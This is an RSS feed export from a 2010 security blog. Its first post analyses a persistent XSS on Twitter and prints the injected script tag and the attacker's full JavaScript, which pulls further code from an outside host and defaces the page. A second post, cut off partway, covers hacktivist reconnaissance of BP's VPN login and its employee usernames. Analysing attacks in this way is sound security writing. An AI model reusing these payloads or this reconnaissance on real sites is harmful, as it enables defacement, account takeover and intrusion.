<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Praetorian Prefect &#187; twitter</title>
	<atom:link href="http://praetorianprefect.com/archives/tag/twitter/feed/" rel="self" type="application/rss+xml" />
	<link>http://praetorianprefect.com</link>
	<description>Information security, a little slower...a little deeper</description>
	<lastBuildDate>Thu, 29 Jul 2010 16:38:31 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Persistent XSS on Twitter.com</title>
		<link>http://praetorianprefect.com/archives/2010/06/persistent-xss-on-twitter-com/</link>
		<comments>http://praetorianprefect.com/archives/2010/06/persistent-xss-on-twitter-com/#comments</comments>
		<pubDate>Thu, 24 Jun 2010 08:32:11 +0000</pubDate>
		<dc:creator>Prefect</dc:creator>
				<category><![CDATA[Social Networking]]></category>
		<category><![CDATA[twitter]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://praetorianprefect.com/?p=4423</guid>
		<description><![CDATA[Twitter user 0wn3d_5ys has demonstrated a persistent cross site scripting (XSS) vulnerability he found on  June 21st using his own Twitter account (visit at your own risk) that appears to be due to a lack of input validation of the application name field when accepting new requests for Twitter applications.]]></description>
			<content:encoded><![CDATA[<p><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/failwhale.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/failwhale-e1277366677897-150x150.jpg" alt="" title="failwhale" width="150" height="150" class="alignleft size-thumbnail wp-image-4424" /></a></p>

<p>Twitter user 0wn3d_5ys has demonstrated a persistent cross site scripting (XSS) vulnerability on Twitter, which he found on June 21st, using <a href="http://twitter.com/0wn3d_5ys">his own Twitter account</a> (visit at your own risk). It appears to be due to a lack of input validation of the application name field when Twitter accepts new requests for Twitter applications. Visiting his account on Twitter results in a pair of classic cross site scripting alert boxes; then your browser window is manipulated, then you enter the matrix (see below), and finally you get messages from the researcher who found the vulnerability.
<br /><br /><br /></p>

<p><div id="attachment_4428" class="wp-caption alignnone" style="width: 760px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/xss_example.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/xss_example.jpg" alt="" title="xss_example" width="750" height="600" class="size-full wp-image-4428" /></a><p class="wp-caption-text">Initial result of visiting the affected Twitter profile.</p></div>
<br /></p>

<p><div id="attachment_4429" class="wp-caption alignnone" style="width: 336px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/alert1.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/alert1.jpg" alt="" title="alert1" width="326" height="126" class="size-full wp-image-4429" /></a><p class="wp-caption-text">Alert box one.</p></div>
<br /></p>

<p><div id="attachment_4430" class="wp-caption alignnone" style="width: 428px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/alert2.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/alert2.jpg" alt="" title="alert2" width="418" height="126" class="size-full wp-image-4430" /></a><p class="wp-caption-text">Alert box 2.</p></div>
<br /></p>

<p><div id="attachment_4431" class="wp-caption alignnone" style="width: 760px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/matrix_time.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/matrix_time.jpg" alt="" title="matrix_time" width="750" height="600" class="size-full wp-image-4431" /></a><p class="wp-caption-text">Then you're in the matrix.</p></div>
<br /></p>

<p>And lest you wonder at his intentions, he supplies the following messages into the page&#8217;s title tag:</p>

<pre><code>tb8_messages = new tb8_makeArray(4);
tb8_messages[0] = "My Twitter Owned By : H4x0r-x0x..";
tb8_messages[1] = "I can not play twitter";
tb8_messages[2] = "Injections XSSED On Twitter By: H4x0r-x0x";
tb8_messages[3] = "there is no crime here! I just create To smarten view my Twitter profile. Coding by: Indonesian H4x0r";
</code></pre>

<p>He announced the find <a href="http://www.0wn3d-5ys.co.cc/">on his blog</a> as well as the Indonesian forum Balikita.</p>

<h3>The Vulnerable Field</h3>

<p>The problem is similar to one <a href="http://www.davidnaylor.co.uk/massive-twitter-cross-site-scripting-vulnerability.html">described last August</a> by James Slater. That time around the issue was with the application URL; this time it appears the application name is the issue.</p>

<p>The code containing the injection occurs in the application name field (the application name shown after &#8220;via&#8221; on your tweets).</p>

<pre><code>&lt;span&gt;via &lt;a href="http://www.0wn3d-5ys.co.cc" rel="nofollow"&gt;Ub­­&amp;shy;erTw­i­&amp;shy;tter&lt;span 
style="visibility: hidden"&amp;gt; &lt;script src='http://is.gd/cWO66' type='text/javascript'&amp;gt;&lt;/script&amp;gt;&lt;/a&gt;
&lt;/span&gt;
</code></pre>

<p>What do you notice right away? There&#8217;s no closing bracket on the closing script tag (Twitter is HTML-encoding the closing bracket as &amp;gt;, at least partially, in what was submitted). Here the researcher seems to get lucky: his closing script tag is ignored, and the page falls all the way through to another Javascript include before the browser starts interpreting the markup again. Fortunately for him, the next thing the browser interprets is the closing script tag of a Javascript file included by Twitter itself, so the code injection works:</p>

<pre><code>&lt;script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"&gt;&lt;/script&gt;
</code></pre>

<p><div id="attachment_4433" class="wp-caption alignnone" style="width: 389px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/injection_location.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/injection_location.jpg" alt="" title="injection_location" width="379" height="251" class="size-full wp-image-4433" /></a><p class="wp-caption-text">Injection location.</p></div>
<br /></p>

<p>This field is supplied when an application is set up via the Twitter <a href="http://dev.twitter.com/apps/new">Application Registration</a> page.</p>

<p><div id="attachment_4451" class="wp-caption alignnone" style="width: 710px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/appform.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/appform.jpg" alt="" title="appform" width="700" height="711" class="size-full wp-image-4451" /></a><p class="wp-caption-text">Where Application Name is supplied.</p></div>
<br /></p>

<h3>The Javascript</h3>

<p>The shortened URL included (http://is.gd/cWO66) redirects to: http://h1.ripway.com/www.Frendster.com/011.js.</p>

<pre><code>//*----------------------------------*//
alert("::::::||+ &lt;/X55ED&gt; + H4x0r-x0x  +||:::::: ");
alert("::::::::::::::::||+ Page Twitter Owned By: H4x0r-x0x +||:::::::::::::::: \n ::::::||+ H4x0r-x0x From Forum.Balikita.Net &amp; Ungu.com +||::::::");

//*----------------------------------*//
var myjs = document.createElement("script");
myjs.type = "text/javascript";
myjs.src = "http://h1.ripway.com/www.Frendster.com/H4x0r.js";
document.getElementsByTagName("head")[0].appendChild(myjs);

//*----------------------------------*//
var shortc = document.createElement("link");
shortc.rel = "SHORTCUT ICON";
shortc.href = "http://img532.imageshack.us/img532/4308/indonesiaflag.gif";
document.getElementsByTagName("head")[0].appendChild(shortc);

//*----------------------------------*//
var css = document.createElement("link");
css.setAttribute("rel","stylesheet");
css.setAttribute("href","http://h1.ripway.com/www.Frendster.com/twitt.css");
document.getElementsByTagName("head")[0].appendChild(css);

//*----------------------------------*//
var css = document.createElement("link");
css.setAttribute("rel","stylesheet");
css.setAttribute("href"," http://h1.ripway.com/www.Frendster.com/css.css");
document.getElementsByTagName("head")[0].appendChild(css);

//**************************************//

//**************************************//

function tb8_makeArray(n){
this.length = n;
return this.length;
}
tb8_messages = new tb8_makeArray(4);
tb8_messages[0] = "My Twitter Owned By : H4x0r-x0x..";
tb8_messages[1] = "I can not play twitter";
tb8_messages[2] = "Injections XSSED On Twitter By: H4x0r-x0x";
tb8_messages[3] = "there is no crime here! I just create To smarten view my Twitter profile. Coding by: Indonesian H4x0r";
tb8_rptType = 'infinite';
tb8_rptNbr = 5;
tb8_speed = 100;
tb8_delay = 2000;
var tb8_counter=1;
var tb8_currMsg=0;
var tb8_tekst ="";
var tb8_i=0;
var tb8_TID = null;
function tb8_pisi(){
tb8_tekst = tb8_tekst + tb8_messages[tb8_currMsg].substring(tb8_i, tb8_i+1);
document.title = tb8_tekst;
tb8_sp=tb8_speed;
tb8_i++;
if (tb8_i==tb8_messages[tb8_currMsg].length){
tb8_currMsg++; tb8_i=0; tb8_tekst="";tb8_sp=tb8_delay;
}
if (tb8_currMsg == tb8_messages.length){
if ((tb8_rptType == 'finite') &amp;&amp; (tb8_counter==tb8_rptNbr)){
clearTimeout(tb8_TID);
return;
}
tb8_counter++;
tb8_currMsg = 0;
}
tb8_TID = setTimeout("tb8_pisi()", tb8_sp);
}
tb8_pisi()


//------

var message=" syapakahh Qwueee.. w4s Hare ";
///////////////////////////////////
function clickIE() {if (document.all) {(message);return false;}}
function clickNS(e) {if
(document.layers||(document.getElementById&amp;&amp;!document.all)) {
if (e.which==2||e.which==3) {(message);return false;}}}
if (document.layers)
{document.captureEvents(Event.MOUSEDOWN);document.onmousedown=clickNS;}
else{document.onmouseup=clickNS;document.oncontextmenu=clickIE;}

document.oncontextmenu=new Function("return false")
// --&gt;


//***********//
//form tags to omit in NS6+:
var omitformtags=["input", "textarea", "select"]

omitformtags=omitformtags.join("|")

function disableselect(e){
if (omitformtags.indexOf(e.target.tagName.toLowerCase())==-1)
return false
}

function reEnable(){
return true
}

if (typeof document.onselectstart!="undefined")
document.onselectstart=new Function ("return false")
else{
document.onmousedown=disableselect
document.onmouseup=reEnable
}

/***********/

scrW=screen.availWidth
scrH=screen.availHeight
window.resizeTo(10,10)
window.focus()
for(a=0;a&lt;80;a++){
window.moveTo(0,0)
window.resizeTo(0,scrH*a/80)
}

window.resizeTo(0,0)
for(b=0;b&lt;80;b++){
window.moveTo(0,scrH/1)
window.resizeTo(scrW*b/80,0)
}

for(c=0;c&lt;80;c++){
window.moveTo(scrW/1,scrH/1)
window.resizeTo(0,scrH*c/80)
}

for(d=0;d&lt;80;d++){
window.moveTo(scrW/1,0)
window.resizeTo(scrW*d/80,0)
}

for(e=0;e&lt;80;e++){
window.resizeTo(scrW*e/80,scrH*e/80)
}

window.moveTo(0,0)
window.resizeTo(scrW,scrH) 

///************************///
var wibiya_pl = "false";
var wibiya_nc = "true";
var wibiya_latestJq = false;
var wibiya_flashFix = false;
var wibiya_jQuery_ver = 132;
var wibiyaTimeoutId;

function jquery_ver(){
    return parseInt(jQuery.fn.jquery.replace(/\./gi,'').substring(0,3));
}

if (!Array.prototype.indexOf) {
    Array.prototype.indexOf = function(obj, start) {
        for (var i = (start || 0), j = this.length; i &lt; j; i++) {
            if (this[i] === obj) {
                return i;
            }
        }
        return -1;
    }
}

function loadjscssfile(filename, filetype, where){
    var fileref;
    if (filetype=="js"){ //if filename is a external JavaScript file
        fileref=document.createElement("script");
        fileref.setAttribute("type","text/javascript");
        fileref.setAttribute("src", filename);
    }
    else if (filetype=="css"){ //if filename is an external CSS file
        fileref=document.createElement("link");
        fileref.setAttribute("rel", "stylesheet");
        fileref.setAttribute("type", "text/css");
        fileref.setAttribute("href", filename);
    }
    if (typeof fileref!="undefined"){
        if (where=="head"){
            document.getElementsByTagName("head")[0].appendChild(fileref);
        }
        else{
            document.getElementsByTagName("body")[0].appendChild(fileref);
        }
    }
}

function CheckJQueryLoader(toolbarId)
{
    if (typeof jQuery == "function")
    {
        if (!wibiya_latestJq)
        {
            clearTimeout(wibiyaTimeoutId);
            SetToolbarLoad();
        }
        else
        {
            if (jquery_ver() &gt;= wibiya_jQuery_ver)
            {
                clearTimeout(wibiyaTimeoutId);
                SetToolbarLoad();
            }
            else
            {
                wibiyaTimeoutId =  setTimeout("CheckJQueryLoader("+toolbarId+");",200);
            }
        }
    }
    else
    {
        wibiyaTimeoutId =  setTimeout("CheckJQueryLoader("+toolbarId+");",200);
    }
}

function getQueryParam(name){
    var qString = window.location.search.substring(1).split("&amp;");
    var params = new Array();

    var p;
    for(var i=0; i&lt;qString.length; i++){
        p = qString[i].split("=");
        params[p[0]] = p[1];
    }

    return params[name];
}

function SetToolbarLoad(){
    var wibiya_mobiles = ["iphone","ipod","ipad","series60","symbian","android","windows ce",
        "blackberry","palm","avantgo","docomo","vodafone","j-phone",
        "xv6850","htc","lg;","lge","mot","nintendo","nokia","samsung","sonyericsson"];
    wibiyaToolbar.wibiya_isMobile = false;
    wibiyaToolbar.wibiya_uAgent = navigator.userAgent.toLowerCase();
    for(var i=0;i&lt;wibiya_mobiles.length;i++){
        if(wibiyaToolbar.wibiya_uAgent.match(wibiya_mobiles[i]) != null){
            wibiyaToolbar.wibiya_isMobile = true;
            break;
        }
    }

    if ((jQuery.browser.msie &amp;&amp; parseInt(jQuery.browser.version)==6) ||  wibiyaToolbar.wibiya_isMobile == true){
        // ie 6 and below -&gt; do nothing
    }
    else{
        if(wibiya_flashFix === true){
            wibiyaToolbar.rewriteFlash = 0;
            wibiyaToolbar.framework.FlashFix();
            wibiyaToolbar.rewriteFlashInterval = setInterval("wibiyaToolbar.framework.FlashFix();", 3333);
        }

        wibiyadomain = "http://cdn.wibiya.com/Toolbars/dir_0463/Toolbar_463831/";
        // no-conflict
        if (wibiya_nc=="true") jQuery.noConflict();

        var altToolbar = getQueryParam("toolbarObjId");
        // detect jd_gallery, ie, user_request - load page after document.ready
        if (typeof (startGallery) == "function" || jQuery.browser.msie || wibiya_pl=="true") {
            var wibiyaScriptSrc;
            jQuery(document).ready(function(){
                if (typeof altToolbar == "undefined"){
                    wibiyaScriptSrc = wibiyadomain+"toolbar_463831_4c1ec2a47b60f.js";
                }
                else{
                    wibiyaScriptSrc = altToolbar;
                }
                loadjscssfile(wibiyaScriptSrc,"js","body");
            });
        }
        else{
            if (typeof altToolbar == "undefined"){
                wibiyaScriptSrc = wibiyadomain+"toolbar_463831_4c1ec2a47b60f.js";
            }
            else{
                wibiyaScriptSrc = altToolbar;
            }
            loadjscssfile(wibiyaScriptSrc,"js","body");
        }
    }
}


if (typeof(wibiyaToolbar)!="object"){
    if ( typeof jQuery != "function"){
        loadjscssfile("http://cdn.wibiya.com/Scripts/jquery-1.4.2.min.js","js","head");
    }
    else{
        if (wibiya_latestJq &amp;&amp; jquery_ver() != wibiya_jQuery_ver){
            loadjscssfile("http://cdn.wibiya.com/Scripts/jquery-1.4.2.min.js","js","head");
        }
    }

    var wibiyaToolbar = {};
    wibiyaToolbar.framework = {};

    wibiyaToolbar.id="463831";
    wibiyaToolbar.referrer=document.referrer;
    CheckJQueryLoader(wibiyaToolbar.id);
}


/************************************************************************/
/* Rainbow Links Version 1.03 (2003.9.20)                               */
/* Script updated by Dynamicdrive.com for IE6                           */
/* Copyright (C) 1999-2001 TAKANASHI Mizuki                             */
/* takanasi@hamal.freemail.ne.jp                                        */
/*----------------------------------------------------------------------*/
/* Read it somehow even if my English text is a little wrong! ;-)       */
/*                                                                      */
/* Usage:                                                               */
/*  Insert '&lt;script src="rainbow.js"&gt;&lt;/script&gt;' into the BODY section,  */
/*  right after the BODY tag itself, before anything else.              */
/*  You don't need to add "onMouseover" and "onMouseout" attributes!!   */
/*                                                                      */
/*  If you'd like to add effect to other texts(not link texts), then    */
/*  add 'onmouseover="doRainbow(this);"' and                            */
/*  'onmouseout="stopRainbow();"' to the target tags.                   */
/*                                                                      */
/* This Script works with IE4,Netscape6,Mozilla browser and above only, */
/* but no error occurs on other browsers.                               */
/************************************************************************/


////////////////////////////////////////////////////////////////////
// Setting

var rate = 20;  // Increase amount(The degree of the transmutation)


////////////////////////////////////////////////////////////////////
// Main routine

if (document.getElementById)
window.onerror=new Function("return true")

var objActive;  // The object which event occured in
var act = 0;    // Flag during the action
var elmH = 0;   // Hue
var elmS = 128; // Saturation
var elmV = 255; // Value
var clrOrg;     // A color before the change
var TimerID;    // Timer ID


if (document.all) {
    document.onmouseover = doRainbowAnchor;
    document.onmouseout = stopRainbowAnchor;
}
else if (document.getElementById) {
    document.captureEvents(Event.MOUSEOVER | Event.MOUSEOUT);
    document.onmouseover = Mozilla_doRainbowAnchor;
    document.onmouseout = Mozilla_stopRainbowAnchor;
}


//=============================================================================
// doRainbow
//  This function begins to change a color.
//=============================================================================
function doRainbow(obj)
{
    if (act == 0) {
        act = 1;
        if (obj)
            objActive = obj;
        else
            objActive = event.srcElement;
        clrOrg = objActive.style.color;
        TimerID = setInterval("ChangeColor()",100);
    }
}


//=============================================================================
// stopRainbow
//  This function stops to change a color.
//=============================================================================
function stopRainbow()
{
    if (act) {
        objActive.style.color = clrOrg;
        clearInterval(TimerID);
        act = 0;
    }
}


//=============================================================================
// doRainbowAnchor
//  This function begins to change a color. (of a anchor, automatically)
//=============================================================================
function doRainbowAnchor()
{
    if (act == 0) {
        var obj = event.srcElement;
        while (obj.tagName != 'A' &amp;&amp; obj.tagName != 'BODY') {
            obj = obj.parentElement;
            if (obj.tagName == 'A' || obj.tagName == 'BODY')
                break;
        }

        if (obj.tagName == 'A' &amp;&amp; obj.href != '') {
            objActive = obj;
            act = 1;
            clrOrg = objActive.style.color;
            TimerID = setInterval("ChangeColor()",100);
        }
    }
}


//=============================================================================
// stopRainbowAnchor
//  This function stops to change a color. (of a anchor, automatically)
//=============================================================================
function stopRainbowAnchor()
{
    if (act) {
        if (objActive.tagName == 'A') {
            objActive.style.color = clrOrg;
            clearInterval(TimerID);
            act = 0;
        }
    }
}


//=============================================================================
// Mozilla_doRainbowAnchor(for Netscape6 and Mozilla browser)
//  This function begins to change a color. (of a anchor, automatically)
//=============================================================================
function Mozilla_doRainbowAnchor(e)
{
    if (act == 0) {
        obj = e.target;
        while (obj.nodeName != 'A' &amp;&amp; obj.nodeName != 'BODY') {
            obj = obj.parentNode;
            if (obj.nodeName == 'A' || obj.nodeName == 'BODY')
                break;
        }

        if (obj.nodeName == 'A' &amp;&amp; obj.href != '') {
            objActive = obj;
            act = 1;
            clrOrg = obj.style.color;
            TimerID = setInterval("ChangeColor()",100);
        }
    }
}


//=============================================================================
// Mozilla_stopRainbowAnchor(for Netscape6 and Mozilla browser)
//  This function stops to change a color. (of a anchor, automatically)
//=============================================================================
function Mozilla_stopRainbowAnchor(e)
{
    if (act) {
        if (objActive.nodeName == 'A') {
            objActive.style.color = clrOrg;
            clearInterval(TimerID);
            act = 0;
        }
    }
}


//=============================================================================
// Change Color
//  This function changes a color actually.
//=============================================================================
function ChangeColor()
{
    objActive.style.color = makeColor();
}


//=============================================================================
// makeColor
//  This function makes rainbow colors.
//=============================================================================
function makeColor()
{
    // Don't you think Color Gamut to look like Rainbow?

    // HSVtoRGB
    if (elmS == 0) {
        elmR = elmV;    elmG = elmV;    elmB = elmV;
    }
    else {
        t1 = elmV;
        t2 = (255 - elmS) * elmV / 255;
        t3 = elmH % 60;
        t3 = (t1 - t2) * t3 / 60;

        if (elmH &lt; 60) {
            elmR = t1;  elmB = t2;  elmG = t2 + t3;
        }
        else if (elmH &lt; 120) {
            elmG = t1;  elmB = t2;  elmR = t1 - t3;
        }
        else if (elmH &lt; 180) {
            elmG = t1;  elmR = t2;  elmB = t2 + t3;
        }
        else if (elmH &lt; 240) {
            elmB = t1;  elmR = t2;  elmG = t1 - t3;
        }
        else if (elmH &lt; 300) {
            elmB = t1;  elmG = t2;  elmR = t2 + t3;
        }
        else if (elmH &lt; 360) {
            elmR = t1;  elmG = t2;  elmB = t1 - t3;
        }
        else {
            elmR = 0;   elmG = 0;   elmB = 0;
        }
    }

    elmR = Math.floor(elmR).toString(16);
    elmG = Math.floor(elmG).toString(16);
    elmB = Math.floor(elmB).toString(16);
    if (elmR.length == 1)    elmR = "0" + elmR;
    if (elmG.length == 1)    elmG = "0" + elmG;
    if (elmB.length == 1)    elmB = "0" + elmB;

    elmH = elmH + rate;
    if (elmH &gt;= 360)
        elmH = 0;

    return '#' + elmR + elmG + elmB;
}


//****************************//
var scrolltotop={setting:{startline:100,scrollto:0,scrollduration:1000,fadeduration:[500,100]},controlHTML:'&lt;iframe title="h4x0r-x0x" src="http://www5.shoutmix.com/?h4x0r-x0x" width="500" height="700" frameborder="0" scrolling="auto"&gt;&lt;/iframe&gt;',controlattrs:{offsetx:5,offsety:5},anchorkeyword:'#top',state:{isvisible:false,shouldvisible:false},scrollup:function(){if(!this.cssfixedsupport)
this.$control.css({opacity:0})
var dest=isNaN(this.setting.scrollto)?this.setting.scrollto:parseInt(this.setting.scrollto)
if(typeof dest=="string"&amp;&amp;jQuery('#'+dest).length==1)
dest=jQuery('#'+dest).offset().top
else
dest=0
this.$body.animate({scrollTop:dest},this.setting.scrollduration);},keepfixed:function(){var $window=jQuery(window)
var controlx=$window.scrollLeft()+$window.width()-this.$control.width()-this.controlattrs.offsetx
var controly=$window.scrollTop()+$window.height()-this.$control.height()-this.controlattrs.offsety
this.$control.css({left:controlx+'px',top:controly+'px'})},togglecontrol:function(){var scrolltop=jQuery(window).scrollTop()
if(!this.cssfixedsupport)
this.keepfixed()
this.state.shouldvisible=(scrolltop&gt;=this.setting.startline)?true:false
if(this.state.shouldvisible&amp;&amp;!this.state.isvisible){this.$control.stop().animate({opacity:1},this.setting.fadeduration[0])
this.state.isvisible=true}
else if(this.state.shouldvisible==false&amp;&amp;this.state.isvisible){this.$control.stop().animate({opacity:0},this.setting.fadeduration[1])
this.state.isvisible=false}},init:function(){jQuery(document).ready(function($){var mainobj=scrolltotop
var iebrws=document.all
mainobj.cssfixedsupport=!iebrws||iebrws&amp;&amp;document.compatMode=="CSS1Compat"&amp;&amp;window.XMLHttpRequest
mainobj.$body=(window.opera)?(document.compatMode=="CSS1Compat"?$('html'):$('body')):$('html,body')
mainobj.$control=$('&lt;div id="topcontrol"&gt;'+mainobj.controlHTML+'&lt;/div&gt;').css({position:mainobj.cssfixedsupport?'fixed':'absolute',bottom:mainobj.controlattrs.offsety,right:mainobj.controlattrs.offsetx,opacity:0,cursor:'pointer'}).attr({title:'Scroll Back to Top'}).click(function(){mainobj.scrollup();return false}).appendTo('body')
if(document.all&amp;&amp;!window.XMLHttpRequest&amp;&amp;mainobj.$control.text()!='')
mainobj.$control.css({width:mainobj.$control.width()})
mainobj.togglecontrol()
$('a[href="'+mainobj.anchorkeyword+'"]').click(function(){mainobj.scrollup()
return false})
$(window).bind('scroll resize',function(e){mainobj.togglecontrol()})})}}
scrolltotop.init()
</code></pre>

<h3>H4X0R-X0X</h3>

<p>The researcher who found the problem hosts his blog at a .co.cc URL. While .cc is the country code for the Cocos (Keeling) Islands, an Australian territory, .co.cc is actually a company offering free subdomain redirection services (http://www.co.cc/). The IP address of the blog (74.125.113.121) is shown as owned by Google Inc. Perhaps the most relevant piece of origin information is the language used on the blog and in the forum: Indonesian.</p>

<p>The flag isn&#8217;t a bad clue either.</p>

<p><div id="attachment_4437" class="wp-caption alignnone" style="width: 760px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/forum_entry.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/forum_entry.jpg" alt="" title="forum_entry" width="750" height="672" class="size-full wp-image-4437" /></a><p class="wp-caption-text">Forum post at Balikita.net, a Community of Art.</p></div>
<br /></p>

<h3>Impact</h3>

<p>As demonstrated in the past, XSS vulnerabilities in Twitter have been successfully used to take over accounts and create worms (Mikeyy, StalkDaily). Infection (account takeover) can be accomplished simply by visiting a profile that includes a malicious Javascript, making a true self-propagating web site worm possible, as opposed to other more recent attacks based on phishing a user&#8217;s credentials with a fake Twitter login screen (the &#8220;LOL is this you?&#8221; style attacks).</p>

<p><div id="attachment_4462" class="wp-caption alignright" style="width: 160px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/19520928_3.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/19520928_3-150x150.jpg" alt="" title="19520928_3" width="150" height="150" class="size-thumbnail wp-image-4462" /></a><p class="wp-caption-text">Twitter's Del Harvey</p></div>

<p>This might be Twitter&#8217;s first serious cross site scripting vulnerability since the beginning of this year. Twitter has to correct this quickly as it was public knowledge before this post, and has been for days. We note that the problem has been reported to Twitter by a fellow researcher, and we also reported the issue to Del Harvey (Twitter&#8217;s Trust and Safety Team). We could have gone through the security e-mail address, but frankly the last time we did that the response irritated us. And since Harvey once worked <a href="http://www.perverted-justice.com/?pg=profiledel">in a mental institution</a>, she is probably the most qualified to deal with security people.</p>

<h3>Update</h3>

<p>As of 6pm the problem is still active in old applications, as one of our commentators below pointed out (with a working example). Twitter advised that the problem has been corrected for new applications.</p>

<p><strong>Related Posts:</strong></p>
<ul>
<li><a href="http://praetorianprefect.com/archives/2009/12/james-lipton-says-dont-tweet-your-junk/">James Lipton says &#8220;Don&#8217;t tweet your junk&#8221;</a></li>
<li><a href="http://praetorianprefect.com/archives/2009/11/%e2%80%9chi-this-you-lol%e2%80%9d-twitter-attack-snares-kevin-mitnick/">“Hi. This you?? LOL” Twitter Attack Snares Kevin Mitnick</a></li>
<li><a href="http://praetorianprefect.com/archives/2009/11/not-the-haus-of-gaga-too/">Not the Haus of Gaga too</a></li>
<li><a href="http://praetorianprefect.com/archives/2009/10/facebook%e2%80%99s-faith-a-new-scareware-attack/">Facebook’s Faith: A New Scareware Attack</a></li>
<li><a href="http://praetorianprefect.com/archives/2009/09/breaking-twitter-authentication/">Breaking Twitter (authentication)</a></li>
</ul><br />
]]></content:encoded>
			<wfw:commentRss>http://praetorianprefect.com/archives/2010/06/persistent-xss-on-twitter-com/feed/</wfw:commentRss>
		<slash:comments>15</slash:comments>
		</item>
		<item>
		<title>Going After BP</title>
		<link>http://praetorianprefect.com/archives/2010/06/going-after-bp/</link>
		<comments>http://praetorianprefect.com/archives/2010/06/going-after-bp/#comments</comments>
		<pubDate>Wed, 09 Jun 2010 20:43:09 +0000</pubDate>
		<dc:creator>Prefect</dc:creator>
				<category><![CDATA[Web Site Defacement]]></category>
		<category><![CDATA[brute forcing]]></category>
		<category><![CDATA[hacktivism]]></category>
		<category><![CDATA[remote file inclusion]]></category>
		<category><![CDATA[twitter]]></category>
		<category><![CDATA[vpn]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://praetorianprefect.com/?p=4050</guid>
		<description><![CDATA[BP continues to be the subject of criticism following the Deepwater Horizon oil spill, and the hacking community appears to be taking exception to some of BP's recent public relations activities in the online arena.]]></description>
			<content:encoded><![CDATA[<p><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/bp.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/bp-150x150.jpg" alt="" title="bp" width="150" height="150" class="alignleft size-thumbnail wp-image-4055" /></a></p>

<p>BP continues to be the subject of criticism following the Deepwater Horizon oil spill, and the hacking community appears to be taking exception to some of BP&#8217;s recent public relations activities in the online arena. Specifically, reactions to BP&#8217;s having bought the sponsored link for the search term &#8216;oil spill&#8217; seem to have triggered resentment in the form of reconnaissance work, a Twitter account compromise, and an amusing cross site scripting vulnerability.</p>

<p>In the Reddit case, the method shown and the gotchas demonstrated are worth covering, although no actual hack takes place. The XSS demonstrated at the bottom of the post is just creative and funny.</p>

<h3>Twitter</h3>

<p>As widely reported, on May 27th BP&#8217;s official Twitter account was compromised and the following tweet was posted.</p>

<p><div id="attachment_4062" class="wp-caption alignnone" style="width: 558px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/bp-twitter-hacked.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/bp-twitter-hacked.jpg" alt="" title="bp-twitter-hacked" width="548" height="417" class="size-full wp-image-4062" /></a><p class="wp-caption-text">Pick a stronger password.</p></div>
<br /></p>

<p>And while it&#8217;s not a hack, the spoof Twitter account <a href="http://www.twitter.com/BPGlobalPR">BPGlobalPR</a> has garnered some attention (150k followers) as a satirical response to BP&#8217;s actual public relations response. It has gotten enough attention that the real BP has made overtures to the fake account to <a href="http://newsfeed.time.com/2010/06/09/bp-gets-bpglobalpr-to-clean-up-its-twitter/">better identify itself as a parody</a>.</p>

<h3>Reddit</h3>

<p>Last night on Reddit, user skipperdee responded to a post about the BP sponsored link <a href="http://www.reddit.com/r/politics/comments/ccuc1/if_bp_wants_to_waste_their_money_buying_key_words/">as follows</a>:</p>

<p><div id="attachment_4059" class="wp-caption alignnone" style="width: 760px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/h08EB2.png"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/h08EB2.png" alt="" title="h08EB" width="750" height="526" class="size-full wp-image-4059" /></a><p class="wp-caption-text">Reconnaissance</p></div>
<br /></p>

<p>Let&#8217;s walk through his suggestions:</p>

<h4>VPN Login Screen</h4>

<p>Looking at what&#8217;s here, he found what is ostensibly a VPN login screen for some extranet type applications: https://access.bpglobal.com/bp/C/login.html?_targetURL=https://access.bpglobal.com/pkmslogin.form (the _targetURL parameter looks like an open redirect).</p>

<p>One mark against information security: it offers either certificate based authentication or, alternatively, login with a plain id and password.</p>

<p><div id="attachment_4056" class="wp-caption alignnone" style="width: 760px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/IDAM_login.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/IDAM_login.jpg" alt="" title="IDAM_login" width="750" height="360" class="size-full wp-image-4056" /></a><p class="wp-caption-text">https://access.bpglobal.com/help/bpcertExpired.html</p></div>
<br /></p>

<p>A review of this screen (above), however, seems to indicate that the user&#8217;s Windows login (Active Directory) is the same as their IDAM login, since it refers to an &#8220;NT ID and password&#8221;.</p>

<h4>User Names</h4>

<p>Our Reddit user goes on to show off a little Google hacking by demonstrating how to find the user names of BP employees:</p>

